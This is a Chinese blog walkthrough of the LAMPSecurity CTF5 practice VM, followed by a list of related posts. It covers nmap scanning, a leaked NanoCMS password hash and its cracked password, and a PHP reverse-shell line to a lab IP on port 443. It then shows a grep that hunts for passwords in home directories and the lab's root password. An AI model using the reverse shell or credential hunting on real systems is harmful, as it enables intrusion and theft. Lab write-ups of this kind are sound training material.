【学渗透靶机——CTF5】

已于 2023-06-21 17:19:55 修改
阅读量259 收藏
点赞数
分类专栏: 靶机学习 文章标签: 安全 网络 数据库
于 2023-05-14 14:41:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130667080
版权
文章描述了一次CTF竞赛中的信息收集过程,包括使用Nmap扫描主机IP和开放端口,发现SQL注入和远程代码执行漏洞。通过密码hash解密获取Nanocms后台登录凭据,写入反弹shell,然后尝试系统权限提升,最终成功获取root权限。
摘要由CSDN通过智能技术生成

lampSecurityCTF4

信息收集

主机信息收集

主机ip

nmap -sn 192.168.241.0/24

在这里插入图片描述

主机开放端口

root@kali:/root/baji_100/CTF5# nmap --min-rate 10000 -p- 192.168.241.153

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -O  -p22,25,80,110,139,143,445,901,3306,55439  192.168.241.153

在这里插入图片描述

主机漏洞探测

nmap --script=vuln -p22,25,80,110,111,129,143,445,901,3306,55439 192.168.241.153

在这里插入图片描述
总结,通过nmap 扫描主机咯东发现有几个路径存在sql 注入、和枚举
剩余没什么有用信息。 之后在测试

web 信息收集

访问80端口

在这里插入图片描述
通过浏览发现blog 使用的nanocms
在这里插入图片描述
通过搜索searchsploit ,存在远程代码执行,但是需要登录,我们目前没有账号密码
在这里插入图片描述
通过互联网搜索,发信有个密码hash 信息泄露的路径
在这里插入图片描述
访问该路径,果然存在,账号admin 密码 hash
在这里插入图片描述

在线解密 hash,密码为:shannon
在这里插入图片描述
使用账号密码登录后台成功,发现页面中可写,尝试写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'"); ?>

在这里插入图片描述

获取系统初始shell

通过监听443 获取系统初始shell

在这里插入图片描述
(1)查看当前账号有哪些超级权限,发现需要密码 ,尝试shannon 失败
在这里插入图片描述
(2)查看计划任务,没有有效的信息

在这里插入图片描述

(3)查看/etc/passwd, 及shadow ,发现pass好几个用户, shadow 无权限
在这里插入图片描述
(4)搜索pass 关键字信息
多账号下 搜索是否存在账号密码信息

grep -R -i pass /home/*  2>/dev/null  |grep -v jquery

在这里插入图片描述
查看该文件, 密码50$cent
在这里插入图片描述

提权

切换root登录 ,登录成功

在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ftp服务后面漏洞——CTF靶机
panda.
10-24 353
使用metasploit平台扫描查看有无漏洞。使用nmap工具扫描靶机查看端口开放状态。渗透靶机,并且权限是root权限。首先使用fping扫描靶机ip。发现有漏洞,使用漏洞并配置参数。扫描21端口服务版本信息。
超菜鸟级ctf5
kid的博客
05-18 4106
超菜鸟级ctf5 前言 这次的题整体也比较简单,感觉密码题可能多了点 题目 门太低了 这道题前面也做过类似,考查xss,查看源码也能看到提示xss,这里script必须小写,大写还不行…没什么意思的题啊 New Swan Stone Castle 这中sql注入已经做了很多了,sqlmap都是可以直接跑出来的 这里手工注入的话要闭合括号和双引号。能用sqlmap直接不调参就跑出来,意义...
Hack the LAMPSecurity: CTF 5 (CTF Challenge)
菜鸟耿耿
12-04 1615
Hack the LAMPSecurity: CTF 5 (CTF Challenge) 你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ 下载完之后就开始我们今天的挑战啦~~ 实战演练 环境说明 kali IP:192.168.35.128 主机
手把手教你打造CTF动态靶场(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
07-17 1042
公司想搞一个CTF比赛,需要一个竞赛靶场,于是这个任务就落在了我的身上,平台是利用CTFd框架,基于docker搭建的动态靶场,搭建过程中遇到的坑比较多,这里我会把每一个遇到的坑都指出来。我搭建的是CTFd的3.X的版本。
靶机精讲之CTF5
m0_63285023的博客
04-11 198
sudo -l看权限 cat /etc/passwd查看用户目录(提权过程)searchsploit nanocms 搜索漏洞。试着切换root用户,试着拿到更好的shell。-R递归 -i忽略大小写 报错的扔掉。破解字典 -k保留。linux端破解MD5。搜索nanocms漏洞。password密码。
CTF-5.SSH私钥泄露
woo233的博客
09-11 774
如何从外部进入最终root主机,取得flag。
vulnhub靶机练习ctf5
weixin_53665747的博客
06-06 121
靶机整体还是属于较容易,这里自己走了很多弯路,一个是文件包含,一个是不会使用linux自带的强大工具自动化信息收集,还有就是/没有想起路径信息。这三个点花费了我大部分时间。还有就是如何快速定位薄弱资产的能力,对于有已知cms或框架的地方就应该去主攻nday。后面还要多多习linux系统使用。
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1644
Vulnhub-CTF5靶机实战
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 482
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
网络渗透测试实验四——CTF实践
MJ_1900301430的博客
12-06 713
网络渗透测试实验四——CTF实践 实验目的 通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境 Kali Linux 2、WebDeveloper 靶机来源:https://www.vulnhub.com/ 实验工具 不限 实验步骤和内容 目的 获取靶机Web Developer 文件/
靶机渗透——BTRsys1
1匹黑马
02-23 1746
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:BRTsys1 涉及知识点:代码审计、目录遍历、文件上传、脏牛提权 信息收集 还是老样子先进行信息收集: arp-scan -l #扫描内网存活主机 接着扫一下开放的端口与版本信息 nmap -sV -O 192.168.1.116 开放了22、80端口,话不多说,直接扫一下Web页面...
CMS-Exploit-Framework:CMS 漏洞利用框架
07-10
CMS Exploit Framework 简介 CMS Exploit Framework 是一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。 安装 本框架采用 Python 语言开发,并且第三方依赖包都已打包,所以您所需要做的只是下载、启动。 chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.git Cloning into 'CMS-Exploit-Framework'... remote: Counting objects: 352, done. remote: Compressing objects: 100% (182/182), done. remote: Total 352 (delta 159), reused
[网络安全篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
ctf web5 练习_安全检查中...
weixin_39866867的博客
12-29 143
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![])+(!+[]+(!...
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 1104
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和提权的过程需要经验。
CTF综合靶机渗透
xv66666的博客
08-11 1137
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
CTF靶机 DC-3
weixin_52221158的博客
09-02 863
CTF靶场 DC-3详细讲解
LAMPSecurityCTF5渗透测试流程
RemedyVI的博客
07-13 460
80端口可能有SQL注入,数据库为mysql版本大于5.0,可能获取user表信息登录cms后台或其余后台,php版本已知,可能有可利用漏洞,apache版本较老可能有漏洞,openssh版本较老可能有漏洞,操作系统为Linux。猜测该靶机思路:SQL注入->获取后台账户密码->登录后台->利用漏洞获取反弹shell->提权80 Apache httpd 2.2.6 ((Fedora)) (可能存在SQL注入)110 ipop3d 2006k.101 接收邮件。
CTF实践 靶机渗透
Radiency的博客
11-23 1512
CTF实践。通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值